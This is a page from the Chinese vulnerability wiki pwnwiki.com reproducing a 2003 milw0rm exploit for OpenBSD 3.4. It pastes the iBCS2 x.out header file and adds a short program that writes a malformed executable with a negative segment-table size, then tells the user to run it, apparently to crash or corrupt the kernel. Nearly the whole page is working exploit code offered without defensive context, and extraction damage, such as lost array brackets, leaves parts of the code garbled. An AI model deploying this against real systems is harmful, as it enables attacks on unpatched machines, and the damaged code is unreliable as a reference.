免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
// // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch // #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdio.h> /* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */ /* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */ /* * Copyright (c) 1994, 1995 Scott Bartram * All rights reserved. * * adapted from sys/sys/exec_ecoff.h * based on Intel iBCS2 * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef _IBCS2_EXEC_H_ #define _IBCS2_EXEC_H_ /* * COFF file header */ struct coff_filehdr { u_short f_magic; /* magic number */ u_short f_nscns; /* # of sections */ long f_timdat; /* timestamp */ long f_symptr; /* file offset of symbol table */ long f_nsyms; /* # of symbol table entries */ u_short f_opthdr; /* size of optional header */ u_short f_flags; /* flags */ }; /* f_magic flags */ #define COFF_MAGIC_I386 0x14c /* f_flags */ #define COFF_F_RELFLG 0x1 #define COFF_F_EXEC 0x2 #define COFF_F_LNNO 0x4 #define COFF_F_LSYMS 0x8 #define COFF_F_SWABD 0x40 #define COFF_F_AR16WR 0x80 #define COFF_F_AR32WR 0x100 /* * COFF system header */ struct coff_aouthdr { short a_magic; short a_vstamp; long a_tsize; long a_dsize; long a_bsize; long a_entry; long a_tstart; long a_dstart; }; /* magic */ #define COFF_OMAGIC 0407 /* text not write-protected; data seg is contiguous with text */ #define COFF_NMAGIC 0410 /* text is write-protected; data starts at next seg following text */ #define COFF_ZMAGIC 0413 /* text and data segs are aligned for direct paging */ #define COFF_SMAGIC 0443 /* shared lib */ /* * COFF section header */ struct coff_scnhdr { char s_name8; long s_paddr; long s_vaddr; long s_size; long s_scnptr; long s_relptr; long s_lnnoptr; u_short s_nreloc; u_short s_nlnno; long s_flags; }; /* s_flags */ #define COFF_STYP_REG 0x00 #define COFF_STYP_DSECT 0x01 #define COFF_STYP_NOLOAD 0x02 #define COFF_STYP_GROUP 0x04 #define COFF_STYP_PAD 0x08 #define COFF_STYP_COPY 0x10 #define COFF_STYP_TEXT 0x20 #define COFF_STYP_DATA 0x40 #define COFF_STYP_BSS 0x80 #define COFF_STYP_INFO 0x200 #define COFF_STYP_OVER 0x400 #define COFF_STYP_SHLIB 0x800 /* * COFF shared library header */ struct coff_slhdr { long entry_len; /* in words */ long path_index; /* in words */ char sl_name1; }; #define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1)) #define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1)) #define COFF_HDR_SIZE \ (sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr)) #define COFF_BLOCK_ALIGN(ap, value) \ (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \ value) #define COFF_TXTOFF(fp, ap) \ (ap->a_magic == COFF_ZMAGIC ? 0 : \ COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \ sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap))) #define COFF_DATOFF(fp, ap) \ (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize)) #define COFF_SEGMENT_ALIGN(ap, value) \ (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \ COFF_SEGMENT_ALIGNMENT(ap)))) #define COFF_LDPGSZ 4096 #define COFF_SEGMENT_ALIGNMENT(ap) 4 #define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386) #define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28) #define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128) struct exec_package; int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *); /* * x.out (XENIX) */ struct xexec { u_short x_magic; /* magic number */ u_short x_ext; /* size of extended header */ long x_text; /* ignored */ long x_data; /* ignored */ long x_bss; /* ignored */ long x_syms; /* ignored */ long x_reloc; /* ignored */ long x_entry; /* executable entry point */ char x_cpu; /* processor type */ char x_relsym; /* ignored */ u_short x_renv; /* flags */ }; /* x_magic flags */ #define XOUT_MAGIC 0x0206 /* x_cpu flags */ #define XC_386 0x004a /* 386, word-swapped */ /* x_renv flags */ #define XE_V5 0xc000 #define XE_SEG 0x0800 #define XE_ABS 0x0400 #define XE_ITER 0x0200 #define XE_VMOD 0x0100 #define XE_FPH 0x0080 #define XE_LTEXT 0x0040 #define XE_LDATA 0x0020 #define XE_OVER 0x0010 #define XE_FS 0x0008 #define XE_PURE 0x0004 #define XE_SEP 0x0002 #define XE_EXEC 0x0001 /* * x.out extended header */ struct xext { long xe_trsize; /* ignored */ long xe_drsize; /* ignored */ long xe_tbase; /* ignored */ long xe_dbase; /* ignored */ long xe_stksize; /* stack size if XE_FS set in x_renv */ long xe_segpos; /* offset of segment table */ long xe_segsize; /* segment table size */ long xe_mdtpos; /* ignored */ long xe_mdtsize; /* ignored */ char xe_mdttype; /* ignored */ char xe_pagesize; /* ignored */ char xe_ostype; /* ignored */ char xe_osvers; /* ignored */ u_short xe_eseg; /* ignored */ u_short xe_sres; /* ignored */ }; /* * x.out segment table */ struct xseg { u_short xs_type; /* segment type */ u_short xs_attr; /* attribute flags */ u_short xs_seg; /* segment selector number */ char xs_align; /* ignored */ char xs_cres; /* ignored */ long xs_filpos; /* offset of this segment */ long xs_psize; /* physical segment size */ long xs_vsize; /* virtual segment size */ long xs_rbase; /* relocation base address */ u_short xs_noff; /* ignored */ u_short xs_sres; /* ignored */ long xs_lres; /* ignored */ }; /* xs_type flags */ #define XS_TNULL 0 /* unused */ #define XS_TTEXT 1 /* text (read-only) */ #define XS_TDATA 2 /* data (read-write) */ #define XS_TSYMS 3 /* symbol table (noload) */ #define XS_TREL 4 /* relocation segment (noload) */ #define XS_TSESTR 5 /* string table (noload) */ #define XS_TGRPS 6 /* group segment (noload) */ #define XS_TIDATA 64 #define XS_TTSS 65 #define XS_TLFIX 66 #define XS_TDNAME 67 #define XS_TDTEXT 68 #define XS_TDFIX 69 #define XS_TOVTAB 70 #define XS_T71 71 #define XS_TSYSTR 72 /* xs_attr flags */ #define XS_AMEM 0x8000 /* memory image */ #define XS_AITER 0x0001 /* iteration records */ #define XS_AHUGE 0x0002 /* unused */ #define XS_ABSS 0x0004 /* uninitialized data */ #define XS_APURE 0x0008 /* read-only (sharable) segment */ #define XS_AEDOWN 0x0010 /* expand down memory segment */ #define XS_APRIV 0x0020 /* unused */ #define XS_A32BIT 0x0040 /* 32-bit text/data */ /* * x.out iteration record */ struct xiter { long xi_size; /* text/data size */ long xi_rep; /* number of replications */ long xi_offset; /* offset within segment to replicated data */ }; #define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext)) int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *); #endif /* !_IBCS2_EXEC_H_ */ int main(int ac,char **av) { int fd; struct xexec xp; struct xext xep; char exe10; char fil="./vvc"; fd=open(fil,O_CREAT|O_RDWR,0700); if (fd==-1) {perror("open");return 1;} memset(&xp,0,sizeof(xp)); memset(&xep,0,sizeof(xep)); memset(exe,'v',sizeof(exe)); xp.x_magic = XOUT_MAGIC; xp.x_cpu = XC_386; xp.x_renv = XE_EXEC; xp.x_ext = sizeof(xep); xep.xe_segsize = -1; write(fd,&xp,sizeof(xp)); write(fd,&xep,sizeof(xep)); write(fd,exe,sizeof(exe)); printf("Now exec %s\n",fil); } // milw0rm.com 2003-11-07
免费、自由、人人可编辑的漏洞库--pwnwiki.com